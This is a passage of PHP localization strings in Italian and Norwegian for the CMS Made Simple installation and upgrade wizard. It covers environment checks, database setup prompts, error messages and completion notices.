$lang['msg_yourvalue'] = 'Tu hai: %s';
$lang['multibyte_support'] = 'Verifica del supporto multibyte';
$lang['next'] = 'Avanti';
$lang['no'] = 'No';
$lang['none'] = 'Nessuno';
$lang['open_basedir'] = 'Restrizioni open_basedir';
$lang['open_basedir_session_save_path'] = 'open_basedir è attivato. Non posso testare la sessione save path.';
$lang['output_buffering'] = 'Verifica abilitazione dell\'output del buffering';
$lang['pass_config_writable'] = 'Il processo HTTP ha il permesso di scrittura nel file config.php';
$lang['pass_database_support'] = 'Trovato almeno un driver di database compatibile';
$lang['pass_func_json'] = 'Rilevata la funzionalità json';
$lang['pass_func_md5'] = 'La funzionalità md5 è stata rilevata';
$lang['pass_func_tempnam'] = 'La funzione tempnam esiste';
$lang['pass_memory_limit_nolimit'] = 'Non c\'è un limite di memoria PHP preimpostato';
$lang['pass_multibyte_support'] = 'Il supporto Multibyte sembra essere abilitato';
$lang['pass_php_version'] = 'La versione di PHP attualmente configurata non corrisponde ai requisiti minimi. Si richiede almeno PHP %s , ma si raccomanda %s o superiore';
$lang['pass_pwd_writable'] = 'Il processo HTTP può scrivere nella directory di destinazione. Ciò è necessario per estrarre i file';
$lang['password'] = 'Password';
$lang['ph_sitename'] = 'Inserisci un nome del sito';
$lang['php_version'] = 'Versione PHP';
$lang['post_max_size'] = 'Verifica della massima quantità di dati che può essere inviata in una richiesta';
$lang['prompt_addlanguages'] = 'Lingue aggiuntive';
$lang['prompt_createtables'] = 'Crea tabelle del database';
$lang['prompt_dbhost'] = 'Hostname del database';
$lang['prompt_dbinfo'] = 'Informazioni del database';
$lang['prompt_dbname'] = 'Nome del database';
$lang['prompt_dbpass'] = 'Password';
$lang['prompt_dbport'] = 'Numero della porta del database';
$lang['prompt_dbprefix'] = 'Prefisso nome tabella del database';
$lang['prompt_dbtype'] = 'Tipo di database';
$lang['prompt_dbuser'] = 'Nome utente';
$lang['prompt_dir'] = 'Directory di installazione';
$lang['prompt_installcontent'] = 'Installa contenuti di esempio';
$lang['prompt_queryvar'] = 'Variabile Query';
$lang['prompt_sitename'] = 'Nome del sito web';
$lang['prompt_timezone'] = 'Fuso orario del server';
$lang['pwd_writable'] = 'Directory scrivibile';
$lang['queue_for_upgrade'] = 'Accodato modulo non core %s per aggiornamento al prossimo step.';
$lang['readme_uc'] = 'README';
$lang['register_globals'] = 'Verifica disabilitazione "register globals"';
$lang['remote_url'] = 'Test sulla possibilità di effettuare connessioni HTTP in uscita';
$lang['repeatpw'] = 'Ripeti password';
$lang['reset_site_preferences'] = 'Resetta alcune preferenze del sito';
$lang['reset_user_settings'] = 'Resetta le preferenze dell\'utente';
$lang['retry'] = 'Riprova';
$lang['safe_mode'] = 'Test per verificare che "safe mode" sia disabilitato';
$lang['saltpasswords'] = 'Salt Passwords';
$lang['select_language'] = 'La prima cosa che ti chiediamo di fare è quella di selezionare la tua lingua preferita dall\'elenco qui sotto. Ciò servirà a migliorare la tua esperienza durante la procedura di installazione, ma non inciderà sull\'installazione di CMSMS.';
$lang['send_admin_email'] = 'Invia e-mail con le credenziali per il login dell\'amministratore';
$lang['session_capabilities'] = 'Test sulle corrette funzionalità di sessione (le sessioni usano i cookie e il percorso di salvataggio della sessione è scrivibile, ecc)';
$lang['session_save_path_exists'] = 'Session_save_path esiste';
$lang['session_save_path_writable'] = 'Session_save_path è scrivibile';
$lang['session_use_cookies'] = 'Verifica che le sessioni PHP usino i cookie';
$lang['sometests_failed'] = 'Sono stati effettuati numerosi test del tuo attuale ambiente web. Sebbene non siano stati rilevati problemi critici, si raccomanda che i seguenti elementi vengano corretti prima di continuare.';
$lang['step1_advanced'] = 'Modalità avanzata';
$lang['step1_destdir'] = 'Seleziona la directory';
$lang['step1_info_destdir'] = '<strong>Attenzione:</strong> Questo programma può installare od aggiornare installazioni multiple di CMS Made Simple. E\' importante che tu selezioni la directory corretta per l\'installazione o per l\'aggiornamento.';
$lang['step1_language'] = 'Seleziona la lingua';
$lang['step1_title'] = 'Seleziona la lingua';
$lang['step2_cmsmsfound'] = 'E\' stata rilevata un\'installazione di CMS Made Simple. Si può aggiornare questa installazione. Tuttavia, prima di procedere, assicurati di avere un backup attuale e verificato di tutti i file e del database';
$lang['step2_cmsmsfoundnoupgrade'] = 'Sebbene sia stata rilevata un\'installazione di CMS Made Simple, non si può aggiornare questa versione usando questa applicazione. La versione potrebbe essere troppo vecchia.';
$lang['step2_confirminstall'] = 'Sei sicuro di voler installare CMS Made Simple';
$lang['step2_confirmupgrade'] = 'Sei sicuro di voler aggiornare CMS Made Simple';
$lang['step2_errorsamever'] = 'Sembra che la directory selezionata contenga già un\'installazione di CMSMS con la stessa versione inclusa in questo script. Continuando si rinnoverà l\'installazione.';
$lang['step2_errortoonew'] = 'Sembra che la directory selezionata contenga già un\'installazione di CMSMS con una versione più recente di quella contenuta in questo script. Impossibile procedere';
$lang['step2_info_freshen'] = 'Il rinnovamento dell\'installazione comporta la sostituzione di tutti i file del core e la creazione di una nuova configurazione. Ti verranno richieste alcune informazioni di base relative alla configurazione, tuttavia il database non verrà toccato.';
$lang['step2_installdate'] = 'Data approssimativa di installazione';
$lang['step2_install_dirnotempty2'] = 'Questa cartella contiene già alcuni file e/o sottocartelle.  Sebbene sia possibile installare qui CMSMS, ciò potrebbe inavvertitamente danneggiare un\'applicazione esistente.  Per favore ricontrolla i contenuti di questa cartella.  A scopo di riferimento alcuni di questi file sono elencati qui sotto.  Per favore assicurati che ciò sia esatto.';
$lang['step2_hdr_upgradeinfo'] = 'Informazioni di versione';
$lang['step2_info_upgradeinfo'] = 'Qui sotto trovi le note di rilascio disponibili e le informazioni del changelog per ogni release. Il pulsante sottostante mostrerà informazioni dettagliate su cosa è cambiato in ogni versione di CMS Made Simple. Potrebbero esserci ulteriori istruzioni od avvisi in ogni versione che potrebbero incidere sul processo di aggiornamento.';
$lang['step2_minupgradever'] = 'La versione minima dalla quale questa applicazione può effettuare l\'aggiornamento è: %s. Dovresti aggiornare la tua applicazione ad una versione più recente in più passaggi, usando un altro metodo prima di completare il processo di aggiornamento. Per favore assicurati di avere un backup completo e verificato prima di usare un qualsiasi metodo di aggiornamento.';
$lang['step2_nocmsms'] = 'Non è stata rilevata un\'installazione di CMS Made Simple in questa directory. Sembra che questa sia una nuova installazione';
$lang['step2_nofiles'] = 'Come richiesto, i file del Core di CMSMS non saranno elaborati durante questo processo';
$lang['step2_passed'] = 'Superato';
$lang['step2_pwd'] = 'La tua directory di lavoro attuale';
$lang['step2_schemaver'] = 'Versione Schema Database';
$lang['step2_version'] = 'La tua versione';
$lang['step3_failed'] = 'Questo pacchetto ha effettuato numerosi test del tuo ambiente PHP ed uno o più di questi test sono falliti. Dovrai correggere questi errori nella tua configurazione prima di continuare. Una volta corretti gli errori, clicka su "Riprova" qui sotto.';
$lang['step3_passed'] = 'Questo pacchetto ha effettuato numerosi test del tuo ambiente PHP e sono stati tutti superati. Questa è un\'ottima notizia! Sebbene non si tratti di un test onnicomprensivo, non dovresti avere difficoltà a far funzionare l\'installazione del core di CMSMS.';
$lang['step9_removethis'] = '<strong>Attenzione</strong> Per ragioni di sicurezza è importante che venga rimosso l\'installer dal tuo sito navigabile appena avrai verificato che l\'operazione abbia avuto successo.';
$lang['symbol'] = 'Simbolo';
$lang['social_message'] = 'CMS Made Simple è stato installato con successo!';
$lang['test_failed'] = 'Un test richiesto è fallito';
$lang['test_passed'] = 'Un test è stato superato <em>(i test superati vengono mostrati solo nella modalità avanzata)</em>';
$lang['test_warning'] = 'Un\'impostazione è al di sopra del valore richiesto, ma al di sotto del valore raccomandato, o...<br />Una funzionalità che potrebbe essere necessaria per qualche funzionalità opzionale non è disponibile';
$lang['th_status'] = 'Stato';
$lang['th_testname'] = 'Test';
$lang['th_value'] = 'Valore';
$lang['title_error'] = 'Houston, abbiamo un problema!';
$lang['title_step2'] = 'Passo 2 - Rilevamento software esistente';
$lang['title_step3'] = 'Passo 3 - Test';
$lang['title_step4'] = 'Passo 4 - Informazioni di base per la configurazione';
$lang['title_step5'] = 'Passo 5 - Informazioni per l\'account dell\'amministratore';
$lang['title_step6'] = 'Passo 6 - Impostazioni del sito';
$lang['title_step7'] = 'Passo 7 - Installa i file dell\'applicazione';
$lang['title_step8'] = 'Passo 8 - Lavoro sul Database';
$lang['title_step9'] = 'Passo 9 - Finito';
$lang['title_welcome'] = 'Benvenuto';
$lang['title_forum'] = 'Forum di supporto';
$lang['title_docs'] = 'Documentazione ufficiale';
$lang['title_api_docs'] = 'Documentazione API ufficiale';
$lang['to'] = 'a';
$lang['title_share'] = 'Condividi la tua esperienza con i tuoi amici.';
$lang['tmpfile'] = 'Controllo funzionamento tmpfile()';
$lang['tmp_dirs_empty'] = 'Verifica che le directory temporanee siano vuote o che non esistano';
$lang['upgrade'] = 'Aggiorna';
$lang['upgrade_deleteoldevents'] = 'Cancellazione vecchi eventi';
$lang['upgrading_schema'] = 'Aggiornamento schema database';
$lang['upload_max_filesize'] = 'Controllo dimensione massima dei file caricati';
$lang['username'] = 'Nome utente';
$lang['warn_disable_functions'] = 'Nota: una o più funzioni del core di PHP sono disabilitate. Ciò può avere un impatto negativo sulla tua installazione di CMSMS, in particolar modo con estensioni di terze parti. Per favore tieni d\'occhio il tuo error log. Le tue funzioni disabilitate sono: <br /><br />%s';
$lang['warn_max_execution_time'] = 'Sebbene il tuo tempo massimo di esecuzione di %s sia pari o superiore al valore minimo di %s, si raccomanda di aumentarlo a %s o superiore';
$lang['warn_memory_limit'] = 'Il valore del tuo limite di memoria è %s, che è al di sopra del minimo di %s. Tuttavia, si raccomanda %s';
$lang['warn_open_basedir'] = 'open_basedir è abilitato nella tua configurazione php.  Sebbene tu possa continuare, CMSMS non supporterà installazioni con restrizioni open_basedir.';
$lang['warn_post_max_size'] = 'Il valore della massima dimensione dei  post è %s, che è al di sopra del minimo di %s, tuttavia si raccomanda %s . Per favore assicurati anche che questo valore sia superiore a upload_max_filesize';
$lang['warn_tests'] = '<strong>Nota:</strong> Il superamento di tutti questi test dovrebbe garantire che CMSMS funzioni correttamente per la maggior parte dei siti. Tuttavia, col crescere del sito e l\'aggiunta di altre funzionalità, questi valori minimi potrebbero diventare insufficienti. Inoltre, moduli di terze parti potrebbero aver bisogno di altre risorse per funzionare correttamente';
$lang['warn_upload_max_filesize'] = 'Sebbene la tua impostazione di %s sia sufficiente, si raccomanda di aumentare l\'impostazione di upload_max_filesize in PHP ad almeno %s';
$lang['welcome_message'] = 'Benvenuto! Questo è il Sistema Automatico di Installazione di CMS Made Simple.  Questo pacchetto ti consentirà di avere rapidamente e facilmente la conferma che il tuo host web è compatibile con CMSMS e di installarlo od aggiornarlo alla versione più recente di CMS Made Simple.<br />Siamo sicuri che lo apprezzerai.';
$lang['wizard_step1'] = 'Benvenuto';
$lang['wizard_step2'] = 'Rilevazione software esistente';
$lang['wizard_step3'] = 'Test di compatibilità';
$lang['wizard_step4'] = 'Informazioni di configurazione';
$lang['wizard_step5'] = 'Informazioni dell\'account dell\'amministratore';
$lang['wizard_step6'] = 'Impostazioni del sito';
$lang['wizard_step7'] = 'File';
$lang['wizard_step8'] = 'Lavoro database';
$lang['wizard_step9'] = 'Finito';
$lang['xml_functions'] = 'Controllo funzionalità XML in corso';
$lang['yes'] = 'Sì';
?><?php
$lang['action_freshen'] = 'Friske opp / reparere en CMSMS %s installasjon';
$lang['action_install'] = 'Opprette en ny CMSMS %s hjemmeside';
$lang['action_upgrade'] = 'Oppgrader en CMSMS Nettstedet til versjon %s';
$lang['advanced_mode'] = 'Aktiver avansert modus';
$lang['apptitle'] = 'Installasjon og oppgraderings assistent';
$lang['assets_dir_exists'] = 'Assets katalogen eksisterer';
$lang['available_languages'] = 'Tilgjengelige språk';
$lang['build_date'] = 'Byggedato';
$lang['changelog_uc'] = 'ENDRINGSLOGG';
$lang['cleaning_files'] = 'Rens for filer som ikke lenger er aktuelt for utgivelsen';
$lang['config_writable'] = 'Test for skrivbar config fil';
$lang['confirm_freshen'] = 'Er du sikker på at du ønsker å oppfriske (reparere) den eksisterende installasjonen av CMSMS. Bruk med ekstrem forsiktighet!';
$lang['confirm_upgrade'] = 'Er du sikker på at du vil starte oppgraderingsprosessen';
$lang['curl_extension'] = 'Sjekk for Curl utvidelsen';
$lang['create_assets_structure'] = 'Oppretter en lokasjon for fil ressurser';
$lang['database_support'] = 'Sjekk for kompatible database drivere';
$lang['desc_wizard_step1'] = 'Start installasjonen eller oppgraderings prosessen';
$lang['desc_wizard_step2'] = 'Analyse av mål katalog for å finne eksisterende software';
$lang['desc_wizard_step3'] = 'Sjekk for å være sikker på at alt er OK for å installere CMSMS core/kjernen';
$lang['desc_wizard_step4'] = 'For nye installasjoner, og oppfriskings handling, oppgi grunnleggende configurasjon info';
$lang['desc_wizard_step5'] = 'For nye installasjoner, oppgi administrasjonskonto info';
$lang['desc_wizard_step6'] = 'For nye installasjoner, oppgi grunnleggende nettstedsdetaljer';
$lang['desc_wizard_step7'] = 'Pakk ut filer';
$lang['desc_wizard_step8'] = 'Opprette eller oppdatere databaseskjemaet, sett innledende handlinger, tillatelser, brukerkontoer, maler, stilark og innhold';
$lang['desc_wizard_step9'] = 'Installer og/eller oppgrader moduler om nødvendig, skrive config-filen, og rydde opp.';
$lang['destination_directory'] = 'Målkatalog';
$lang['dest_writable'] = 'Skrive rettighet i målkatalogen';
$lang['disable_functions'] = 'Avslåtte funksjoner';
$lang['done'] = 'utført';
$lang['email_accountinfo_message'] = 'Din installasjon av CMS Made Simple er ferdig.

Denne e-posten inneholder sensitiv informasjon, og bør oppbevares på et sikkert sted.

Her er detaljene for din installasjon.
brukernavn: %s
passord: %s
installasjonskatalog: %s
root url: %s';
$lang['email_accountinfo_message_exp'] = 'Din installasjon av CMS Made Simple er ferdig.

Denne e-posten inneholder sensitiv informasjon, og bør oppbevares på et sikkert sted.

Her er detaljene for din installasjon.
brukernavn: %s
passord: %s
installasjonskatalog: %s';
$lang['email_accountinfo_subject'] = 'Installasjon av CMS Made Simple var vellykket';
$lang['emailaccountinfo'] = 'Send kontoinformasjonen via e-post';
$lang['emailaddr'] = 'E-postadresse';
$lang['error_adminacct_emailaddr'] = 'E-posten du oppgav er ugyldig';
$lang['error_adminacct_emailaddrrequired'] = 'Du har valgt å sende kontoinformasjonen, men har ikke lagt inn en gyldig e-postadresse';
$lang['error_adminacct_password'] = 'Passordet er ugyldig (må være minst seks tegn)';
$lang['error_adminacct_repeatpw'] = 'Passordene samsvarte ikke.';
$lang['error_adminacct_username'] = 'Brukernavnet er ugyldig. Vennligst prøv igjen';
$lang['error_admindirrenamed'] = 'Det ser ut til at av sikkerhetsmessige grunner så har du kanskje omdøpt din CMSMS admin katalog. Du må reversere <a href="http://docs.cmsmadesimple.org/general-information/securing-cmsms#renaming-admin-folder" target="_blank" class="external"> denne prosessen</a> for å fortsette!';
$lang['error_backupconfig'] = 'Vi kunne ikke skikkelig ta sikkerhetskopi av config-filen';
$lang['error_checksum'] = 'Utpakket fil checksum samsvarer ikke med original';
$lang['error_cmstablesexist'] = 'Det ser ut til at det allerede er en CMS installasjon på denne databasen. Vennligst oppgi annen databaseinformasjon. Hvis du ønsker å bruke en annen tabell prefix vil du måtte restarte installasjonsprosessen og aktivere avansert modus.';
$lang['error_createtable'] = 'Problem med å opprette databasetabell... mulig dette er et rettighetsproblem';
$lang['error_dbconnect'] = 'Vi kunne ikke koble til databasen. Vennligst dobbeltsjekk legitimasjonen du har oppgitt';
$lang['error_dirnotvalid'] = 'Katalogen %s finnes ikke (eller så er den ikke skrivbar)';
$lang['error_droptable'] = 'Problem fjerne databasetabell ... kanskje dette er et problem med tillatelser';
$lang['error_filenotwritable'] = 'Filen %s kunne ikke overskrives (tillatelses problem)';
$lang['error_internal'] = 'Beklager, noe har gått galt ... (intern feil) (%s)';
$lang['error_invalid_directory'] = 'Det ser ut til at den katalogen du har valgt å installere i er en arbeidskatalog for installatøren selv';
$lang['error_invalidconfig'] = 'Feil i config-filen, eller config fil mangler';
$lang['error_invaliddbpassword'] = 'Database passord inneholder ugyldige tegn som ikke trygt kan lagres.';
$lang['error_invalidkey'] = 'Ugyldig medlemsvariabel eller nøkkel %s for klasse %s';
$lang['error_invalidparam'] = 'Ugyldig parameter eller verdi for parameter: %s';
$lang['error_invalidtimezone'] = 'Tidssonen er ugyldig';
$lang['error_invalidqueryvar'] = 'Forespørselvariabelen inneholder ugyldige tegn. Bruk bare alfanumeriske tegn og understrek.';
$lang['error_missingconfigvar'] = 'Nøkkelen "%s" enten mangler eller er ugyldig i filen config.ini';
$lang['error_noarchive'] = 'Problem med å finne arkivfilen ... vennligst start på nytt';
$lang['error_nlsnotfound'] = 'Problemer med å finne NLS filer i arkivet';
$lang['error_nodatabases'] = 'Ingen kompatible database utvidelser ble funnet';
$lang['error_nodbhost'] = 'Vennligst skriv inn et gyldig vertsnavn (eller IP-adresse) for databasetilkoblingen';
$lang['error_nodbname'] = 'Vennligst skriv inn navnet på en gyldig database på verten angitt ovenfor';
$lang['error_nodbpass'] = 'Vennligst skriv inn et gyldig passord for å autentisere til databasen';
$lang['error_nodbprefix'] = 'Vennligst skriv inn et gyldig prefiks for databasetabeller';
$lang['error_nodbtype'] = 'Vennligst velg en database type';
$lang['error_nodbuser'] = 'Vennligst skriv inn et gyldig brukernavn for autentisering til databasen';
$lang['error_nodestdir'] = 'Målkatalog ikke satt';
$lang['error_nositename'] = 'Nettstedsnavn er en nødvendig parameter. Vennligst skriv inn et passende navn på ditt nettsted.';
$lang['error_notimezone'] = 'Vennligst skriv inn en gyldig tidssone for denne serveren';
$lang['error_overwrite'] = 'Tillatelsesproblem: kan ikke overskrive %s';
$lang['error_sendingmail'] = 'Feil ved sending av e-post';
$lang['error_tzlist'] = 'Et problem oppstod med å hente listen med tidssone identifikatorer';
$lang['errorlevel_estrict'] = 'Tester for E_STRICT';
$lang['errorlevel_edeprecated'] = 'Tester for E_DEPRECATED';
$lang['edeprecated_enabled'] = 'E_DEPRECATED er aktivert i PHP\'s error_reporting. Selv om dette ikke vil hindre CMSMS fra drift kan det resultere i at advarsler blir vist i utdataene. Spesielt fra eldre tredjeparts moduler';
$lang['estrict_enabled'] = 'E_STRICT er aktivert i PHP\'s error_reporting. Selv om dette ikke vil hindre CMSMS fra drift, kan det resultere i advarsler blir vist i HTML-visning. Spesielt fra eldre tredjeparts moduler';
$lang['fail_assets_dir'] = 'En eiendel katalog finnes allerede. Dette programmet kan skrive til denne katalogen for å rasjonere plasseringen av filene. Vennligst sørg for at du har en sikkerhetskopi';
$lang['fail_assets_msg'] = 'En eiendeler katalog finnes allerede. Denne applikasjonen kan skrive til denne katalogen for å rasjonalisere plasseringen av filer. Sørg for at du har en sikkerhetskopi';
$lang['fail_config_writable'] = 'HTTP-prosessen kan ikke skrive til config.php filen. Vennligst prøv å endre tillatelsene på denne filen til 777 inntil oppgraderingen er fullført';
$lang['fail_curl_extension'] = 'Curl utvidelsen er ikke funnet. Selv om ikke dette er et kritisk problem så kan dette føre til problemer med enkelte tredjeparts moduler';
$lang['fail_database_support'] = 'Ingen Kompatible database drivere funnet';
$lang['fail_file_get_contents'] = 'file_get_contents funksjonen finnes ikke, eller er deaktivert. CMSMS Kan ikke fortsette (selv installasjonsprogrammet vil sannsynligvis mislykkes)';
$lang['fail_file_uploads'] = 'Opplasting funksjoner er deaktivert i dette miljøet. Flere funksjoner i CMSMS vil ikke fungere i dette miljøet';
$lang['fail_func_json'] = 'json funksjonalitet ble ikke funnet';
$lang['fail_func_gzopen'] = 'gzopen funkjson ble ikke funnet';
$lang['fail_func_md5'] = 'md5 funksjonalitet ble ikke funnet';
$lang['fail_func_tempnam'] = 'tempnam funksjonen finnes ikke. Dette er en nødvendig funksjon for CMSMS funksjonaliteten';
$lang['fail_func_ziparchive'] = 'ZipArchive funksjonalitet ble ikke funnet. Dette kan begrense funksjonaliteten';
$lang['fail_ini_set'] = 'Det ser ut til at vi ikke kan endre ini innstillinger. Dette kan føre til problemer i tredjeparts moduler (eller ved aktivering av debug-modus)';
$lang['fail_intl_support'] = 'PHP internasjonaliseringsutvidelse er ikke tilgjengelig';
$lang['fail_magic_quotes_runtime'] = 'Det ser ut til at magic quotes(/magiske sitater) er aktivert i konfigurasjonen. Vennligst deaktivere dette og prøv på nytt';
$lang['fail_max_execution_time'] = 'Din maks Execution time på %s oppfyller ikke minimumsverdien på %s. Vi anbefaler deg å øke det til %s eller høyere';
$lang['fail_memory_limit'] = 'Memory Limit grenseverdien er for lav. Du hadde %s, men et minimum på %s er nødvendig, og %s er anbefalt';
$lang['fail_multibyte_support'] = 'Multibyte støtte er ikke aktivert i din konfigurasjon';
$lang['fail_output_buffering'] = 'Output Buffering(/Mellomlagring av utdata) er ikke aktivert.';
$lang['fail_open_basedir'] = 'Open basedir restriksjoner er i kraft. CMSMS krever at dette skal være deaktivert';
$lang['fail_php_version'] = 'Versjonen av PHP tilgjengelig for CMSMS er av kritisk betydning. Minste aksepterte versjonen er %s, men vi anbefaler %s eller høyere. Du har %s';
$lang['fail_post_max_size'] = 'Din Post max size(/innlegg maks størrelse) på %s oppfyller ikke minimumsverdien på %s. Du må øke til påkrevd minimum. Men du bør øke den til %s og også sikre at det er større enn upload_max_filesize';
$lang['fail_pwd_writable2'] = 'HTTP-prosessen må være i stand til å skrive til destinasjons katalogen (og til alle filer og kataloger under den) for å installere filer. Vi har ikke skrivetilgang til (minst) %s';
$lang['fail_register_globals'] = 'Vennligst deaktiver Register Globals i din PHP konfigurasjon';
$lang['fail_remote_url'] = 'Vi fikk problemer med å koble til en ekstern URL. Dette vil begrense noe av funksjonaliteten i CMS Made Simple';
$lang['fail_safe_mode'] = 'CMSMS vil ikke fungere skikkelig i et miljø hvor sikkermodus er aktivert. Bare så dere vet: Sikkermodus er foreldet som en mislykket mekanisme, og vil bli fjernet i fremtidige versjoner av PHP';
$lang['fail_session_save_path_exists'] = 'Session save path variabelverdien er ugyldig eller mappen finnes ikke';
$lang['fail_session_save_path_writable'] = 'Session save path katalogen er ikke skrivbar';
$lang['fail_session_use_cookies'] = 'Sessijoner er IKKE satt til å benytte cookies';
$lang['fail_tmpfile'] = 'Systemets tmpfile() -funksjon fungerer ikke. Dette er nødvendig for å tillate oss å trekke ut arkiver. Det valgfrie TMPDIR url argumentet kan gis for installasjonsprogrammet for å spesifisere en skrivbar katalog. Se README-filen som bør være i inkludert i denne katalogen.';
$lang['fail_tmp_dirs_empty'] = 'De CMSMS Midlertidige kataloger <em>(tmp/cache and tmp/templates_c) eksisterer, og er ikke tom. Vennligst fjern eller tømme dem';
$lang['fail_xml_functions'] = 'XML utvidelsen ble ikke funnet. Vennligst aktiver dette i ditt PHP miljø';
$lang['failed'] = 'feilet';
$lang['file_get_contents'] = 'Testing av file_get_contents funksjonen';
$lang['file_installed'] = 'Installert %s';
$lang['file_uploads'] = 'Testing for filopplasting støtte';
$lang['finished_custom_freshen_msg'] = 'Installasjonen har blitt oppfrisket! Kjerne filene har blitt oppdatert, og en ny config-fil er opprettet. Vennligst besøk nettstedet ditt for å forsikre at alt fungerer som det skal';
$lang['finished_custom_install_msg'] = 'Hva! Vi er klare. Vennligst besøk nettstedet og logg inn i administrasjonspanelet';
$lang['finished_custom_upgrade_msg'] = 'Hva! Alt er ferdig. Vennligst besøk ditt CMSMS Admin panel, og frontend for å sikre at alt fungerer som det skal <br/><strong> Hint: </strong> Nå er et godt tidspunkt å ta en ny backup.';
$lang['finished_freshen_msg'] = 'Installasjonen har blitt oppfrisket! Kjerne filene har blitt oppdatert, og en ny config-filen er opprettet. Du kan nå <a href="%s">besøke nettstedet ditt</a> eller logge inn på <a href="%s">CMSMS Admin panelet</a>.';
$lang['finished_install_msg'] = 'Hva! Vi er klare. Du kan nå <a href="%s">besøke nettstedet ditt</a> eller logge inn på <a href="%s">CMSMS admin panelet</a>.';
$lang['finished_upgrade_msg'] = 'Hva! Alt er klart. Vennligst besøk ditt <a href="%s">nettsteds frontend</a> og <a href="%s">Admin panel</a> for å verifisere korrekt oppførsel. Du må kanskje også oppgradere noen tredjeparts moduler <br/><strong>Hint:</strong> Husk å ta en ny backup etter å ha kontrollert korrekt oppførsel.';
$lang['freshen'] = 'Oppfriske (reparere) installasjon';
$lang['func_json'] = 'Sjekke for JSON koding og dekoding';
$lang['func_md5'] = 'Sjekke for md5 funksjonalitet';
$lang['func_tempnam'] = 'Sjekk for tempnam funksjon';
$lang['func_gzopen'] = 'Sjekk for gzopen funksjon';
$lang['func_ziparchive'] = 'Sjekk for ziparchive funksjon';
$lang['gd_version'] = 'GD versjon';
$lang['goback'] = 'Tilbake';
$lang['info_addlanguages'] = 'Velg språk (i tillegg til engelsk) som skal installeres. <strong>Merk:</strong> ikke alle oversettelser er fullført.';
$lang['info_adminaccount'] = 'Vennligst oppgi legitimasjon for den første administratorkontoen. Denne kontoen vil ha tilgang til all funksjonalitet i CMSMS admin konsollen.';
$lang['info_advanced'] = 'Avansert modus gir flere alternativer i installasjonsprosedyren.';
$lang['info_dbinfo'] = 'CMS Made Simple lagrer mye data i databasen. En database tilkobling er obligatorisk. I tillegg bør den brukerlegitimasjonen du leverer har alle privilegier på den angitte databasen for å tillate oppretting, sletting og endring av tabeller, indekser og visninger.';
$lang['info_errorlevel_edeprecated'] = 'E_DEPRECATED er et flagg for php\'s feilrapportering som indikerer at advarsler skal vises om kode som bruker utdaterte teknikker. For CMSMS kjernen forsøker vi å sikre at vi ikke lenger bruker utdaterte teknikker, noen moduler kanskje ikke følger opp dette. Vi anbefaler at denne innstillingen deaktiveres i PHP-konfigurasjonen';
$lang['info_errorlevel_estrict'] = 'E_STRICT er et flagg for php\'s feilrapportering som viser at strenge kodestandarder bør respekteres. Selv om CMSMS kjernen forsøker å samsvare med E_STRICT standarder så mulig enkelte moduler ikke er det. Vi anbefaler at denne innstillingen deaktiveres i PHP-konfigurasjonen';
$lang['info_installcontent'] = 'Som standard vil dette installasjonsprogrammet skape en rekke eksempler på sider, stilark og maler i CMSMS. Prøveinnholdet gir omfattende informasjon og tips til hjelpe i å bygge nettsteder med CMSMS og er nyttig å lese. Hvis du allerede er kjent med CMS Made Simple så vil deaktivering av dette alternativet vil bare opprette et minimalt sett med maler, stilark og innholdssider.';
$lang['info_open_basedir_session_save_path'] = 'open_basedir er aktivert i din PHP konfigurasjon. Vi kunne ikke skikkelig teste session evner. Men det å komme til dette punktet i installasjonsprosessen indikerer trolig at øktene jobber greit.';
$lang['info_pwd_writable'] = 'Denne applikasjonen krever skrivetilgang til gjeldende arbeidskatalog';
$lang['info_queryvar'] = 'Spørringsvariabelen brukes internt av CMSMS for å identifisere den forespurte siden. I de fleste tilfeller har du ikke behov for å endre denne.';
$lang['info_sitename'] = 'Nettstedsnavnet brukes i standardmaler som en del av tittelen. Vennligst skriv inn et lesbart navn for nettstedet';
$lang['info_timezone'] = 'Tidssone informasjon er nødvendig for tidsberegning og tid/datovisning. Vennligst velg server tidssone';
$lang['ini_set'] = 'Test om vi kan endre INI-instillinger';
$lang['install'] = 'Installer';
$lang['install_attachstylesheets'] = 'Koble stilark til tema';
$lang['install_backupconfig'] = 'Sikkerhetskopierer config-filen';
$lang['install_createassets'] = 'Opprett eiendel struktur';
$lang['install_created_index'] = 'Opprettet indeks %s ... %s';
$lang['install_create_tables'] = 'Oppretter database tabeller';
$lang['install_createconfig'] = 'Oppretter ny config-fil';
$lang['install_createcontentpages'] = 'Oppretter nye innholdssider';
$lang['install_created_table'] = 'Opprettet tabell %s: .... %s';
$lang['install_createtablesindexes'] = 'Oppretter tabeller og indekser';
$lang['install_createtmpdirs'] = 'Oppretter midlertidige kataloger';
$lang['install_creating_index'] = 'Opprettet indeks %s';
$lang['install_default_collections'] = 'Installer standard samlinger';
$lang['install_defaultcontent'] = 'Installer standard innhold';
$lang['install_detectlanguages'] = 'Oppdag installerte språk';
$lang['install_dropping_tables'] = 'Fjern tabeller';
$lang['install_dummyindexhtml'] = 'Opprett dummy index.html filer';
$lang['install_extractfiles'] = 'Pakk ut filer fra arkivet';
$lang['install_initevents'] = 'Opprett hendelser';
$lang['install_initsitegroups'] = 'Opprett innledende grupper';
$lang['install_initsiteperms'] = 'Sett innledende rettigheter';
$lang['install_initsiteprefs'] = 'Sett innledende nettsteds-innstillinger';
$lang['install_initsiteusers'] = 'Opprett innledende brukerkontoer';
$lang['install_initsiteusertags'] = 'Innledende brukerdefinerte tagger';
$lang['install_module'] = 'Installer modul %s';
$lang['install_modules'] = 'Installer tilgjengelige moduler';
$lang['install_passwordsalt'] = 'Sett passord salting';
$lang['install_requireddata'] = 'Sett innledende påkrevd data';
$lang['install_schema'] = 'Opprett database sjema';
$lang['install_setschemaver'] = 'Sett skjema versjon';
$lang['install_setsequence'] = 'Tilbakestill sekvens tabeller';
$lang['install_setsitename'] = 'Sett nettstedsnavn';
$lang['install_stylesheets'] = 'Opprett standard stilark';
$lang['install_templates'] = 'Opprett standaard maler';
$lang['install_templatetypes'] = 'Opprett standard maltyper';
$lang['install_update_sequences'] = 'Oppdater sekvens tabeller';
$lang['install_updatehierarchy'] = 'Oppdater innholdets hierarkiposisjoner';
$lang['install_updateseq'] = 'Oppdater sekvens for %s';
$lang['installer_ver'] = 'Installer versjon';
$lang['intl_support'] = 'Se etter internasjonaliseringsevner';
$lang['legend'] = 'Forklaring';
$lang['magic_quotes_runtime'] = 'Forsikrer oss om at magiske sitater er deaktivert';
$lang['max_execution_time'] = 'Kontrollere PHP-script maks Utføringstid';
$lang['meaning'] = 'Betydning';
$lang['memory_limit'] = 'Sjekker for tilstrekkelig PHP minnegrense';
$lang['msg_clearedcache'] = 'Tømte serverens mellomlager';
